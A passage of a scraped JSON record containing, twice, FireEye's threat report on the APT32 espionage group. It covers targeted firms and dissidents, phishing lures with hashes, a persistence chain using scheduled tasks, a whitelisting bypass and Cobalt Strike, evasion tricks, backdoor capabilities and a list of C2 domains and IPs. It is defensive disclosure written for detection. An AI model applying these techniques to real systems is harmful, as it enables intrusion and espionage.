(OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. 
FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. 
Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign 
governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. 
APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. 
When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. 
Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. 
Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. 
For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| \n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry 
manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. 
While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| 
\n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| \n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-14T18:00:00", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": 
"2017-05-14T18:00:00", "id": "FIREEYE:3E714A2B7BA85E8C1459F38BE1BC289A", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-12T18:15:32", "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. 
This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. 
and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. 
Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. 
These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. 
Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. 
When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. 
Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. 
For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| 